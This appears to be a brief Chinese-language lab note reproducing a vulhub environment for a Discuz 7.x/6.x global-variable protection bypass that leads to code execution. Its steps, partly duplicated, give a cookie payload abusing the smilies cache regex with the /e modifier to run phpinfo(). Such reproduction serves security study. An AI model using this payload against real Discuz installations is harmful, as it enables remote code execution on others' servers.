复现vulhub上的Discuz 7.x/6.x 全局变量防御绕过导致代码执行。
- 启动环境
2. 访问http://your-ip:8080/install/
来安装discuz
3.安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
:
复现vulhub上的Discuz 7.x/6.x 全局变量防御绕过导致代码执行。
2. 访问http://your-ip:8080/install/
来安装discuz
3.安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
: